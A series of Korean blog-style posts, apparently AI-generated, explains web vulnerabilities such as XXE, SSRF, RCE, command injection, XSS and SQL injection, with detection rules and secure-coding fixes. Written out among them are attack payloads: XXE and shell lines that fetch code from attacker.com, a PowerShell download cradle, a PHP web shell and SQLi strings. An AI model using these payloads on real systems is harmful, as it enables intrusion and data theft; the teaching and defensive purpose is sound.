✔ 서버 측에서 권한 검증(Authorization)을 반드시 할 것

요청이 들어올 때마다 이 사용자가 해당 리소스에 접근 가능한지 확인
클라이언트 검증만 절대 금지

✔ URL, 파라미터, Body 모두 검증

userId, fileId 등 식별자 직접 입력 요소는 특히 주의

✔ 민감한 기능은 서버에서 Role 기반으로 체크

RBAC(Role-Based Access Control)
ABAC(Attribute-Based Access Control)

✔ 관리자 페이지는 별도 인증 필요

MFA, IP 제한 등

✔ 로그 및 모니터링

권한 우회 시도 감지 → 보안관제에서 빠르게 대응

[보안_GPT] Broken Authentication이란?

isaacToast — Fri, 14 Nov 2025 11:21:11 +0900

**Broken Authentication(취약한 인증)**을 정리해줄게.
보안관제 관점 + 개발 보안 관점까지 실무 위주로 설명할게.

1. Broken Authentication이란?

정의:
Broken Authentication은 인증(로그인) 기능이 안전하게 설계되지 않아 공격자가 계정을 도용하거나 인증을 우회할 수 있는 취약점을 의미해.

쉽게 말해:

로그인/세션 관리가 허술해서 공격자가 사용자의 계정으로 들어오는 상황

2. Broken Authentication이 발생하는 대표 상황

✔ 1) 취약한 비밀번호 정책

너무 짧거나 쉬운 비밀번호 허용
비밀번호 복잡도 없음
중복 비밀번호 허용

✔ 2) Brute-force / Credential Stuffing 방어 미흡

로그인 횟수 제한 없음
CAPTCHA 없음
2FA 없음

✔ 3) 세션 관리 취약

세션 ID가 예측 가능
로그인 후 세션 재발급 안 함(Session Fixation)
세션 만료 시간 과도하게 김
세션이 HTTPOnly/secure 옵션 없음

✔ 4) 인증 우회 가능

직접 URL 접근으로 로그인 우회
잘못된 인증 로직

✔ 5) MFA(2단계 인증) 부재 또는 우회 가능

✔ 6) 비밀번호 찾기/재설정 기능 취약

이메일 검증 없음
토큰이 너무 단순 / 만료 없음
누구나 비밀번호 리셋 메일 요청 가능

3. 실무 공격 예시

✔ 1) Brute-force 공격

사용자ID를 고정하고 여러 비밀번호 시도:

POST /login username=admin&password=123456

✔ 2) Credential Stuffing

유출된 이메일/비밀번호 조합 대량 대입

✔ 3) Session Fixation 공격

공격자:

sessionid=knownvalue

피해자가 로그인하면 → 해당 세션이 그대로 유지 → 계정 탈취

✔ 4) 인증 우회 취약점

/login → /home

로그인 검사 없이 접근 가능하면 인증 우회.

✔ 5) 비밀번호 재설정 링크 탈취

재설정 링크가 너무 단순:

/reset?token=12345

4. 공격자가 할 수 있는 일

계정 탈취
관리자 계정 장악
대량 로그인 시도로 서비스 마비
내부 정보 열람
악성 게시글/댓글 업로드
금전적 피해(결제 시스템이면 더 위험)

5. WAF / 보안관제 관점 대응

✔ 1) 로그인 실패 반복 탐지

동일 IP에서 여러 계정 시도
동일 계정에서 여러 IP 시도
짧은 시간에 과도한 실패 → 차단

✔ 2) Credential Stuffing 패턴 차단

유출 PW 목록 기반 탐지
User-Agent 비정상 반복

✔ 3) 세션 관련 탐지

세션ID 값 비정상 패턴
여러 지역에서 동일 세션 사용

✔ 4) MFA 우회 탐지

로그인 성공 후 MFA 실패 반복

6. 개발 단계 방어책 (중요!)

A. 인증 로직 강화

✔ 비밀번호 정책 강화

대문자 + 소문자 + 숫자 + 특수문자 조합
최소 8~12자 이상 권장

✔ 로그인 시도 제한

5회 이상 실패 시 잠금 처리
IP 기반 rate-limit 적용

✔ CAPTCHA 적용

자동화 공격 방지

✔ MFA 필수 적용

B. 세션 관리 강화

✔ 로그인 성공 시 새로운 세션ID 발급

(Session Fixation 방지)

✔ Secure + HttpOnly + SameSite 옵션 적용

예:

Set-Cookie: session=xyz; Secure; HttpOnly; SameSite=Lax

✔ 세션 타임아웃 설정

일정 시간 후 만료

C. 취약한 비밀번호 재설정 기능 방지

토큰 랜덤 길이 32바이트 이상
10~30분 이내 만료
단일 사용 후 삭제
동일 이메일 요청시 의도치 않은 정보 노출 방지

한 문장 요약

Broken Authentication = 취약한 인증/세션 관리로 인해 공격자가 사용자 계정을 탈취하거나 인증을 우회할 수 있는 모든 문제를 말하며, 비밀번호 정책·세션 관리·로그인 보호 기능 강화로 방어해야 한다.

[보안_GPT] XXE(XML External Entity)란?

isaacToast — Fri, 14 Nov 2025 11:20:02 +0900

XXE(XML External Entity) 취약점을 정리해줄게.
항상처럼 개념 → 공격 원리 → 공격 예시 → 공격 목표 → 대응 방법(WAF/개발) 순서로 설명할게.

1. XXE(XML External Entity)란?

정의:
XXE는 XML 파서가 외부 엔티티(External Entity)를 허용할 때, 공격자가 악의적인 엔티티를 삽입하여 서버 내부 파일을 읽거나, 내부망 요청을 보내거나, DoS를 일으키는 공격이야.

쉽게 말하면:

XML 안에 몰래 “내부 파일 읽어!” 같은 명령을 넣어서 서버에게 시키는 공격

2. 공격 원리

서버가 다음과 같을 때 공격이 가능해짐:

XML을 받아서 처리한다.
XML Parser에서 **외부 엔티티(External Entity)**를 허용한다.
입력 검증이 없다.

구조:

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> &xxe; </root>

서버가 이 XML을 파싱 → file:///etc/passwd 내용을 읽어서 XML에 넣음 → 유출!

3. 실무 공격 예시

✔ 1) 서버 내부 파일 읽기

<!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <data>&file;</data>

→ 서버가 /etc/passwd 내용을 클라이언트에게 돌려줌.

✔ 2) SSRF 유발 (내부망 요청)

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin"> ]> <foo>&xxe;</foo>

→ 내부 관리 페이지 접속 가능.

✔ 3) Windows 파일 읽기

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini"> ]> <foo>&xxe;</foo>

✔ 4) OOB(Out-of-band) XXE

파일 내용이 서버에서 직접 리턴되지 않아도, 공격자 서버로 전송 가능.

<!DOCTYPE xxe [ <!ENTITY % d SYSTEM "http://attacker.com/malicious.dtd"> %d; ]>

공격자 DTD 파일:

<!ENTITY % send SYSTEM "http://attacker.com/?dump=%file;" > %send;

→ 서버 내부 파일이 공격자 서버로 전송됨.

✔ 5) DoS 공격 (Billion Laughs Attack)

XML 엔티티를 폭발적으로 확장하게 하는 공격:

<!DOCTYPE lolz [ <!ENTITY a "lol"> <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"> ]> <lolz>&b;</lolz>

→ XML 파서가 메모리 폭주 → 서버 다운.

4. 공격자가 할 수 있는 일

내부 파일 읽기
내부망 스캐닝(SSRF)
DB/관리자 페이지 접근
민감 정보 탈취
서버 메타데이터 접근
DoS 공격

→ 웹 애플리케이션의 로컬 권한을 거의 그대로 사용할 수 있음

5. WAF / 보안관제 대응 포인트

✔ 1) XML 내부에 아래 패턴 탐지

<!DOCTYPE
<!ENTITY
SYSTEM
PUBLIC
file://
http://127.0.0.1
php://filter 등

✔ 2) OOB XXE 탐지

서버가 갑자기 외부 IP로 XML 요청을 보내는 이상행위 모니터링.

✔ 3) 응답 패턴 분석

응답에 /etc/passwd, root:x:0:0: 등이 포함되면 고위험.

6. 개발 단계 방어

✔ 1) 외부 엔티티 사용 금지 (가장 중요)

XML Parser 설정에서 외부 엔티티 비활성화.

예: Java

factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Python (lxml)

from lxml import etree parser = etree.XMLParser(resolve_entities=False)

✔ 2) DOCTYPE 선언 자체 차단

XML 입력에서 <!DOCTYPE 등장하면 에러 처리.

✔ 3) JSON으로 전환 (가능한 경우)

최근 API는 XML 대신 JSON 사용 → XXE 위험 감소.

✔ 4) 파일 접근 권한 최소화

웹 서버 계정이 민감 파일을 읽지 못하도록 chmod 제한.

한 문장 요약

XXE = XML 파서가 외부 엔티티를 허용할 때 발생하는 취약점으로, 내부 파일 읽기·내부망 접속·DoS까지 가능한 고위험 공격이다.

[보안_GPT] SSRF(Server-Side Request Forgery)란?

isaacToast — Fri, 14 Nov 2025 11:18:56 +0900

**SSRF(Server-Side Request Forgery)**를 실무 중심으로 정리해줄게.

1. SSRF(Server-Side Request Forgery)란?

정의:
SSRF는 공격자가 서버 내부에서 임의의 URL로 요청을 보내도록 강제하는 공격이야.

쉽게 말하면:

“사용자 대신 서버가 요청을 보내게 만들어 내부망을 공격하는 기술”

외부에서 직접 접근할 수 없는 내부 네트워크(127.0.0.1, 10.x.x.x 등) 또는 **메타데이터 서버(클라우드 계정 정보)**를 공격할 수 있다는 점에서 매우 위험해.

2. 공격 원리

[사용자 입력: URL] → [서버가 이를 요청] → [검증 미비] → 내부망 공격 성공

예시:

GET /fetch?url=http://example.com

공격자가:

http://target.com/fetch?url=http://127.0.0.1:3306

서버가 내부 MySQL에 접근 → 내부 정보 노출 가능.

3. 실무 공격 예시

1) 내부망 스캔

url=http://10.0.0.5:8080

→ 내부 서비스가 열려있는지 탐지

2) 클라우드 메타데이터 서버 접근 (매우 위험)

AWS:

http://169.254.169.254/latest/meta-data/iam/security-credentials/

GCP:

http://metadata.google.internal/computeMetadata/v1/

→ 클라우드 계정 권한 탈취 → 인스턴스 제어 가능

3) Redis, Memcached 등 비인증 포트 공격

url=http://127.0.0.1:6379

→ 데이터 삽입/삭제 → RCE까지 이어질 수 있음

4) File:// 프로토콜 악용

url=file:///etc/passwd

→ 로컬 파일 읽기

5) DNS Rebinding

공격자가 만든 도메인을 요청하게 하여 내부 IP로 바뀌게 만듦

4. 공격자가 할 수 있는 일

내부망 스캔 (포트 스캐닝)
DB 공격 (MySQL, Redis 등)
내부 관리 페이지 접근
민감파일 읽기 (file:///)
클라우드 자격 증명 탈취
RCE로 확장 (Cloud API 조작)

즉 → 외부에서 절대 접근하면 안 되는 내부망을 직접 공격 가능

5. WAF / 보안관제 대응 포인트

✔ 1) 위험 URL 패턴 차단

127.0.0.1, localhost
10.*, 172.16.*, 192.168.*
169.254.*
file://, gopher://, ftp://

✔ 2) URL 인코딩 우회 탐지

%2f, %5c, %31%32%37%2e%30%2e%30%2e%31 등

✔ 3) 서버 내부망으로의 아웃바운드 요청 모니터링

갑자기 내부 IP로 HTTP 요청 발생 시 이상행위로 감지

✔ 4) DNS Rebinding 탐지

동일 도메인인데 IP가 급격히 변할 때 알림

6. 개발 단계 방어

URL 화이트리스트 방식
- 지정된 도메인만 요청 가능
로컬/내부 IP 대역 차단
file://, gopher:// 등 위험 프로토콜 금지
Redirect 방어
- 공격자가 외부 URL → 내부URL로 Redirect하는 경우 차단
서버가 내부망에 요청할 때 반드시 프록시 사용
DNS 핀닝(DNS 고정 검증)

한 문장 요약

SSRF = 서버가 공격자의 명령대로 내부망이나 메타데이터 서버로 요청을 보내게 되는 공격으로, 내부 네트워크 공격 및 클라우드 계정 탈취까지 이어지는 매우 위험한 취약점이다.

[보안_GPT] RCE(Remote Code Execution) 란?

isaacToast — Fri, 14 Nov 2025 11:18:02 +0900

**RCE(Remote Code Execution, 원격 코드 실행 취약점)**을 정리해줄게.
실무에서 가장 위험한 공격 중 하나라서 구조·예시·방어까지 확실히 이해해야 해.

1. RCE(Remote Code Execution) 개념

정의:
RCE는 공격자가 원격에서 서버에 임의의 코드를 실행할 수 있게 되는 치명적인 취약점을 말해.

쉽게 말하면:
“공격자가 서버를 자기 컴퓨터처럼 명령을 내려서 조작하는 공격”

2. 발생 원리

웹 애플리케이션이 아래 기능을 제공하는데 입력값 검증이 허술하면 발생:

OS Command 실행 기능 사용 (예: exec, system, shell_exec)
사용자 입력을 코드로 처리하는 기능
파일 업로드 후 서버에서 실행 가능
템플릿 엔진 코드 실행 취약점

즉,

[사용자 입력] → [서버 명령 실행 로직] → [검증 미비] → RCE 발생

3. 실무 공격 예시

1) PHP에서 RCE 발생 예시

system($_GET['cmd']);

공격자 요청:

http://target.com/test.php?cmd=ls -al

2) 시스템 명령 주입

ping 127.0.0.1; cat /etc/passwd

3) Node.js RCE 예시 (eval)

eval(req.body.input);

공격자 입력:

this.constructor.constructor("return process")().mainModule.require('child_process').exec('ls')

4) Python RCE (pickle, eval, os.system)

os.system(user_input)

4. 공격자가 할 수 있는 일

서버 파일 읽기/수정/삭제
데이터베이스 정보 탈취
백도어 설치
내부망 스캔 및 추가 공격
랜섬웨어 실행
서버 전체 장악(루트 권한 획득 가능)

즉 → 서버가 거의 완전히 점령당함

5. WAF / 보안관제 대응 포인트

✔ 1) 위험 패턴 탐지

아래 문자열 포함 요청 탐지/차단:

;, &&, ||, |, $(), `command`
cat /etc/passwd
wget http://malware.com
bash -c
python -c
"cmd=", "system("

✔ 2) 우회 탐지

URL 인코딩: %3b, %26%26
Base64 인코딩된 명령
PowerShell 명령 인코딩

✔ 3) 파일 업로드 후 실행 탐지

업로드 후 .php, .jsp, .asp 실행 요청 발생 시 알람

✔ 4) 이상 행위 모니터링

웹 서버 계정이 비정상적인 시스템 파일 접근
폭주하는 프로세스(spawn)
웹서버가 외부로 파일 전송 시도

6. 개발 단계 방어

✔ 1) OS Command 직접 사용 금지

가능하면 사용하지 않는다.

✔ 2) Parameterized 방식으로 명령 실행

subprocess.run(["ping", "127.0.0.1"])

문자열 결합 금지.

✔ 3) 파일 업로드 디렉토리는 실행 불가로 설정

웹쉘 실행 차단.

✔ 4) 입력값 검증

특수문자 제거
whitelist 기반 검증

✔ 5) 서버 권한 최소화

웹서버 계정을 root로 절대 실행하지 않는다.

한 문장 요약

RCE = 원격에서 서버 명령을 실행할 수 있게 되는 치명적 취약점으로, 공격자가 서버를 완전히 장악할 수 있으므로 입력 검증·권한 최소화·WAF 패턴 차단으로 필수적으로 막아야 한다.

[보안_GPT] Directory Traversal 이란?

isaacToast — Fri, 14 Nov 2025 11:14:41 +0900

**Directory Traversal(경로 조작 공격)**을 실무 관점에서 정리할게.
이번에도 원리 → 공격 예시 → 공격 목표 → 방어 방법/WAF 대응까지 포함했어.

1. Directory Traversal 개념

정의:
Directory Traversal은 웹 애플리케이션에서 파일 경로 입력값을 조작하여, 원래 접근이 제한된 서버 파일이나 디렉토리에 접근하는 공격을 말해.

쉽게 말하면:

공격자가 ../ 같은 경로 조작으로 상위 디렉토리로 이동
서버 내부 중요한 파일(설정, 비밀번호, 로그 등)을 읽거나 다운로드 가능

2. 공격 원리

[사용자 입력: 파일 경로] → [서버 파일 접근] → [검증 미비] → [상위/민감 파일 접근]

예시:

GET /download?file=report.pdf HTTP/1.1

공격자가:

GET /download?file=../../../../etc/passwd HTTP/1.1

서버가 입력값 검증 없이 처리하면 /etc/passwd 파일 내용이 노출됨

3. 실무 공격 예시

1) Linux / Unix

../../../../etc/passwd ../../../../var/www/html/config.php

2) Windows

..\..\..\Windows\System32\drivers\etc\hosts ..\..\..\inetpub\wwwroot\web.config

3) URL 인코딩 우회

..%2f..%2f..%2fetc%2fpasswd

4. 공격 목표

서버 민감 정보 획득: /etc/passwd, DB 설정 파일
웹 애플리케이션 설정 파일 탈취: config.php, web.config
소스 코드 유출 → 추가 취약점 공격 발판
로그, 인증 정보 탈취

5. WAF / 보안관제 대응

경로 패턴 탐지

../, ..\\, %2e%2e%2f, %252e%252e%252f
URL 인코딩 디코딩 후 탐지

허용 경로 제한

서버 파일 접근 시 화이트리스트 경로만 허용
상대경로/상위경로 사용 금지

이상 행위 탐지

반복적으로 상위 디렉토리 접근 시도
공격 IP 차단, 알람 발생

권한 제한

웹서버 계정으로 접근 가능한 디렉토리 최소화
민감 파일은 접근 불가

6. 개발 단계 방어

입력값 검증: .. 또는 / 사용 제한
정규식/화이트리스트 경로만 허용
realpath() 등 함수로 실제 경로 확인 후 접근
민감 파일 디렉토리는 웹 서버 밖에 저장

// PHP 예시: realpath로 경로 검증 $baseDir = '/var/www/uploads/'; $filePath = realpath($baseDir . $_GET['file']); if(strpos($filePath, $baseDir) !== 0) { die("Invalid file path"); }

한 문장 요약

Directory Traversal = 입력값으로 파일 경로를 조작하여 원래 접근이 제한된 서버 파일을 읽거나 다운로드하는 공격이며, 입력 검증과 화이트리스트, 경로 제한, WAF 룰로 방어 가능하다.

[보안_GPT] File Upload Vulnerability 이란?

isaacToast — Fri, 14 Nov 2025 11:12:20 +0900

File Upload Vulnerability를 실무 관점에서 정리할게.
이번에도 원리 → 공격 예시 → 공격 목표 → 방어 방법/WAF 대응까지 포함했어.

1. File Upload Vulnerability 개념

정의:
File Upload Vulnerability는 웹 애플리케이션에서 사용자가 파일을 업로드할 수 있는 기능을 악용하여, 서버에 악성 파일(웹쉘 등)을 업로드하고 실행하는 공격을 말해.

쉽게 말하면:

사용자가 업로드할 수 있다고 허용된 파일을 공격자가 서버에서 임의 실행 가능하도록 조작
서버 장악, 정보 탈취, 악성코드 배포 가능

2. 공격 원리

[웹 업로드 기능] → [서버에 파일 저장] → [웹에서 실행 가능]

웹 애플리케이션이 파일 확장자·내용 검증 미비
업로드 후 서버 접근 경로를 통해 실행 가능
PHP, JSP, ASP 등의 웹쉘 업로드가 대표적

3. 실무 공격 예시

1) 웹쉘 업로드

<?php system($_GET['cmd']); ?>

파일명: shell.php
공격자 브라우저에서:

http://example.com/uploads/shell.php?cmd=ls

2) 확장자 우회

.php.jpg, .php;.jpg, .phtml
MIME 타입 검증 회피

3) 이미지 파일 변조

정상 이미지에 PHP 코드를 삽입 (GIF89a<?php ... ?>)
서버에서 이미지 처리 시 코드 실행 가능

4. 공격 목표

서버 원격 제어(RCE)
민감 정보 탈취
악성코드/랜섬웨어 배포
내부 네트워크 추가 공격

5. WAF / 보안관제 대응

확장자/파일 타입 검사

허용된 확장자만 업로드
MIME 타입 검증

파일 내용 검사

Magic Number 검사
스크립트 코드 삽입 탐지

업로드 경로 제한

웹에서 직접 실행 불가한 디렉토리 사용
서버 실행 권한 없는 디렉토리 설정

이상 행위 탐지

/uploads/*.php 접근 시 경고
반복 공격 IP 차단

실시간 격리 / 백신 스캔

업로드 파일 자동 검사
악성코드/웹쉘 탐지

6. 개발 단계 방어

확장자 Whitelist: .jpg, .png, .pdf 등
파일 이름 변경: 원본 이름 대신 랜덤 문자열로 저장
업로드 경로 제한: 실행 불가, 읽기 전용 디렉토리
파일 내용 검증: Magic Number + MIME 타입
웹쉘 탐지 룰 적용: PHP, JSP, ASP 코드 패턴 차단

// PHP 예시: 실행 불가 디렉토리에 저장 $targetDir = '/var/www/uploads/'; $targetFile = $targetDir . bin2hex(random_bytes(8)) . '.' . $ext; move_uploaded_file($_FILES['file']['tmp_name'], $targetFile);

한 문장 요약

File Upload Vulnerability = 업로드 기능을 악용해 서버에 악성 파일을 넣고 실행시키는 공격이며, 확장자/내용 검증, 실행 불가 디렉토리, WAF 룰로 방어 가능하다.

[보안_GPT] Command Injection 이란?

isaacToast — Fri, 14 Nov 2025 11:10:53 +0900

Command Injection을 실무 관점에서 정리할게.
역시 원리 → 예시 Payload → 공격 목표 → 방어 방법/WAF 대응까지 포함했어.

1. Command Injection 개념

정의:
Command Injection은 웹 애플리케이션에서 사용자 입력을 서버 OS 명령어로 그대로 전달할 때, 공격자가 임의의 OS 명령을 실행하도록 만드는 공격이야.

쉽게 말하면:

공격자가 웹 입력값을 통해 서버 운영체제 명령어를 조작
결과적으로 서버 장악, 파일 조작, 정보 탈취 가능

2. 공격 원리

[웹 입력 필드] → [웹 서버 코드] → [OS 명령어 실행]

예시:

ping <사용자 입력>

공격자가 입력값에 ; ls / 를 넣으면

ping 127.0.0.1; ls /

ping은 정상 수행
ls / → 서버 루트 파일 목록 출력

➡️ 웹 서버가 입력값을 검증 없이 OS 명령어에 연결했기 때문에 발생

3. 실무 Payload 예시

1) Linux / Unix

; ls -la / ; cat /etc/passwd ; wget http://attacker.com/shell.sh -O /tmp/shell.sh; sh /tmp/shell.sh

2) Windows

& dir C:\ & powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"

3) URL / 웹 요청 예시

http://example.com/ping?host=127.0.0.1; ls /etc/

4. 공격 목표

서버 파일 탈취 / 수정
웹쉘 업로드 → 원격 제어
민감 정보 유출 (passwd, config)
다른 서버/네트워크 공격 발판

5. WAF / 관제 대응

명령어 시그니처 차단

;, &, |, && 등의 쉘 메타문자
wget, curl, powershell, cmd.exe

입력값 검증

숫자, IP, 허용 문자열 외 입력 차단
정규식 Whitelist 적용

파라미터 무결성

시스템 명령어 호출을 최소화
외부 입력을 직접 shell로 전달 금지

이상 행위 탐지

비정상 명령 수행 시 로그 생성
반복 공격 IP 차단

6. 개발 단계 방어

OS 명령어 호출 최소화
라이브러리 함수 사용:
- PHP: exec() 대신 proc_open/shell_exec 제한
- Python: subprocess.run([...], shell=False)
사용자 입력 철저 검증 (Whitelist)
Least Privilege 계정 사용 (웹 서버 계정 제한)

# Python 안전 호출 예시 import subprocess # shell=False, 리스트로 전달 → 쉘 인젝션 방지 subprocess.run(["ping", user_input], shell=False)

한 문장 요약

Command Injection = 사용자 입력을 서버 OS 명령어로 그대로 전달할 때 공격자가 임의의 명령을 실행하도록 만드는 공격이며, 입력 검증과 안전한 명령 호출로 방어 가능하다.

[보안_GPT] CSRF(Cross-Site Request Forgery)란?

isaacToast — Fri, 14 Nov 2025 11:10:03 +0900

**CSRF(Cross-Site Request Forgery)**를 실무 관점에서 정리해줄게.
역시 원리 → 예시 → 공격 목표 → WAF/개발 방어까지 포함했어.

1. CSRF(Cross-Site Request Forgery) 개념

정의:
CSRF는 사용자가 로그인한 상태를 이용해, 공격자가 몰래 의도하지 않은 요청을 서버에 보내도록 하는 공격이야.

쉽게 말하면:

사용자는 정상적으로 사이트에 로그인 되어 있음
공격자는 사용자가 모르는 사이 권한 있는 요청을 서버에 보내게 함
공격자는 서버가 요청을 정상 사용자로 인식하게 만듦

2. CSRF 공격 원리

[사용자 브라우저] 로그인 상태 유지 → [악성 사이트 방문] → [자동 전송된 요청] → [타겟 서버에서 실행]

로그인 쿠키나 세션 토큰을 사용
사용자가 버튼 클릭 안 해도 요청 발생 가능

예:

사용자가 은행 로그인 상태로 공격자 페이지 방문 → 몰래 송금 요청 전송

3. CSRF 공격 예시

1) HTML Form 자동 전송

<form action="https://bank.com/transfer" method="POST" id="csrfForm"> <input type="hidden" name="amount" value="1000"> <input type="hidden" name="toAccount" value="attacker"> </form> <script> document.getElementById('csrfForm').submit(); </script>

2) Image 태그 요청 방식(GET)

3) Link 클릭 유도

<a href="https://bank.com/transfer?amount=1000&toAccount=attacker">Click here!</a>

➡️ 사용자는 아무런 의심 없이 클릭하거나 방문만 해도 서버에서 요청 실행

4. 공격 목표

계정 권한을 이용한 송금, 포인트 이동
비밀번호 변경
개인정보 수정
관리자 권한 악용

5. WAF / 보안관제 대응

CSRF 토큰 검증

요청 시 서버가 랜덤 토큰 발급
모든 상태 변경 요청에 토큰 포함
공격자가 토큰 모르면 요청 거부

Referer / Origin 체크

요청 헤더의 출처 검증
외부 사이트에서 오는 요청 차단

SameSite Cookie

SameSite=Lax|Strict 설정
외부 사이트에서 쿠키 자동 전송 방지

WAF 탐지

상태 변경 요청 POST/PUT/DELETE 패턴 감시
외부 출처 Referer 없는 요청 탐지
반복 공격 IP 차단

6. 개발 단계 방어

CSRF Token 사용: 각 세션별 랜덤 값
Hidden Form + Token 검증
GET 요청은 상태 변경 금지
SPA / API: CORS + 토큰 기반 인증

# Flask CSRF 예시 from flask_wtf.csrf import CSRFProtect csrf = CSRFProtect(app)

한 문장 요약

CSRF = 공격자가 사용자의 로그인 세션을 이용해 사용자가 의도하지 않은 요청을 서버로 보내게 만드는 공격이며, CSRF 토큰, Referer 체크, SameSite 쿠키 설정으로 방어 가능하다.

[보안_GPT] 크로스 사이트 스크립트(XSS)란?

isaacToast — Fri, 14 Nov 2025 11:09:00 +0900

**XSS(Cross-Site Scripting)**를 SQL Injection처럼 실무 관점에서 정리해줄게.
웹 보안관제 담당자 기준으로 원리 → 예시 Payload → WAF/방어 방법까지 다 포함했어.

1. XSS(Cross-Site Scripting) 개념

정의:
XSS는 공격자가 악성 스크립트를 웹 페이지에 삽입해, 다른 사용자의 브라우저에서 실행되도록 만드는 공격이야.

쉽게 말하면:

공격자는 사용자가 보는 웹 페이지를 조작
브라우저에서 쿠키·세션·개인정보 탈취, 피싱, 악성 동작 수행 가능

2. XSS 공격 원리

[공격자] → [웹 애플리케이션 입력 필드] → [DB/페이지 저장] → [사용자 브라우저 실행]

사용자가 입력값 검증 없는 댓글, 검색, 게시판 등을 방문하면 스크립트 실행
피해자는 자신의 브라우저에서 악성 JS가 실행되는 것을 인지 못함

3. XSS 종류

종류특징예시

Stored XSS (Persistent)	DB/서버에 악성 스크립트 저장	게시판, 댓글, 블로그 글
Reflected XSS	URL/폼 입력값 그대로 반환	검색, 로그인 에러 메시지
DOM-based XSS	클라이언트 측 JS가 DOM을 잘못 처리	JS에서 innerHTML로 사용자 입력 반영

4. 실무 Payload 예시

1) Alert 테스트

2) 쿠키 탈취

3) Reflected XSS

https://example.com/search?q=<script>alert('XSS')</script>

4) DOM-based XSS

document.getElementById('output').innerHTML = location.hash.substring(1)

URL: https://example.com/page#

5. WAF/보안관제 대응

1) 시그니처 기반 차단

<script>
onerror=
javascript:
eval(
URL 인코딩 패턴 %3Cscript%3E

2) 입력값 필터링 / 인코딩

HTML Encode / Escape < > ' " &
Attribute, URL, JS 컨텍스트 별 인코딩 적용

3) Content Security Policy(CSP)

특정 도메인만 스크립트 로딩 허용
inline script/unsafe-eval 제한

4) Reflected/Stored 감지

게시판, 검색, 입력 필드에서 공격 패턴 탐지
반복 공격 시 IP 차단

6. 개발 단계 방어

입력값 검증: 허용된 문자만 허용(Whitelist)
출력 시 Escape 처리: HTML, JS, URL Context
JS 내 innerHTML, document.write 사용 최소화
라이브러리 사용: DOMPurify, OWASP ESAPI

// 예: DOMPurify 사용 let clean = DOMPurify.sanitize(userInput); document.getElementById('output').innerHTML = clean;

한 문장 요약

XSS = 공격자가 삽입한 악성 스크립트가 다른 사용자의 브라우저에서 실행되어 쿠키 탈취, 피싱, 악성 동작을 수행하는 공격이며, WAF 탐지와 입력값 검증, CSP 적용으로 방어 가능하다.

[보안_GPT] SQL Injection이란?

isaacToast — Fri, 14 Nov 2025 11:03:29 +0900

SQL Injection(SQLi)은 웹 애플리케이션에서 입력값을 통해 데이터베이스 쿼리를 조작하는 공격 기법이야.

쉽게 말하면 **“웹사이트가 입력값을 그대로 DB 쿼리에 넣는 실수를 이용해 공격자가 원하는 명령을 실행하는 것”**이라고 보면 돼.

SQL Injection 개념

공격 원리

웹페이지에서 사용자가 입력한 데이터를 DB 쿼리에 직접 연결할 때 발생
예: 로그인 폼에서 username과 password를 입력받아 DB에서 확인

SELECT * FROM users WHERE username = '$input_user' AND password = '$input_pass';

공격자가 input_user에 ' OR 1=1 -- 를 입력하면

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = '';

결과적으로 조건이 항상 참이 되어 로그인 우회 가능

공격 목표

인증 우회 (로그인 탈취)
민감 정보 조회 (개인정보, 계좌 정보 등)
데이터 삭제·변경·삽입
서버 내부 명령 실행, 파일 접근 가능(Advanced SQLi)

SQL Injection 종류

유형설명

Classic / In-band	결과가 웹페이지에 그대로 나타나는 공격
Error-based	DB 오류 메시지를 이용해 정보 획득
Blind SQLi	결과가 안 나와도 참/거짓 기반으로 정보 추출
Time-based	DB 응답 시간으로 참/거짓 판별
Out-of-band	다른 채널(메일, DNS 등)로 정보 탈취

실무 방어 방법

Prepared Statement / Parameterized Query 사용
입력값 검증(Input Validation)
최소 권한 DB 계정 사용
오류 메시지 노출 금지
WAF 규칙 적용 (SQLi 탐지/차단)
정기적인 취약점 스캔 및 모니터링

한 문장 요약

SQL Injection = 웹 입력값을 조작해 데이터베이스 쿼리를 변조함으로써 정보 탈취, 조작, 권한 우회 등을 수행하는 공격.

공격 예시

아래는 SQL Injection 공격 예시 + 실제 Payload + WAF에서 어떻게 차단하는지를 실무자 기준으로 깔끔하게 정리한 내용이야.
(보안관제·WAF 담당자라면 바로 현업에서 쓸 수 있어.)

1. SQL Injection 공격 원리 (그림 개념)

[사용자 입력] → [웹 서버] → [DB 쿼리 실행] 공격자는 입력값에 SQL 구문을 섞어서 웹 서버가 DB에게 '잘못된 명령'을 실행하게 만듦

예: 로그인 화면에서
ID: ' OR 1=1 --
PW: 아무거나

→ 서버는 아래처럼 쿼리를 만듦

SELECT * FROM users WHERE id='' OR 1=1 --' AND pw='';

OR 1=1 때문에 항상 참 → 로그인 우회 성공

2. 실제 공격 Payload 예시

✔️ (1) 로그인 우회

' OR '1'='1' --

✔️ (2) 데이터 추출 (테이블/컬럼 이름 획득)

' UNION SELECT table_name,1,1 FROM information_schema.tables --

✔️ (3) Error-based SQLi

DB 오류 메시지를 이용해 정보를 역으로 획득

' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) --

✔️ (4) Blind SQLi (TRUE/FALSE 기반)

1' AND (SELECT SUBSTRING(user(), 1, 1)='r') --

✔️ (5) Time-based Blind SQLi

응답 시간으로 데이터 추출

1' AND IF(1=1, SLEEP(5), 0) --

DB가 5초 후 응답 → 조건이 참

3. 공격 시 WAF 로그 예시 (실무 기준)

아래는 WAF에서 흔하게 잡히는 패턴들:

[SQLi] pattern: ' or 1=1 -- [SQLi] keyword: union select [SQLi] function: sleep(5) [SQLi] comment symbol: -- [SQLi] dbms: information_schema [SQLi] special char: updatexml / extractvalue

또는 이런 요청 URL:

/search?q=' OR 1=1 -- /login?id=admin' UNION SELECT ... /product?id=1 AND SLEEP(3)

→ 패턴 매칭, 시그니처, 머신러닝 룰로 차단됨.

4. WAF에서 막는 방법 (실무 버전)

✔️ 1) 시그니처 기반 차단

' OR 1=1
UNION SELECT
SLEEP(
updatexml(
등 SQLi 키워드 탐지 시 차단

✔️ 2) 입력값 검증(Normalization)

URL 인코딩 등 우회 공격 방지
예:
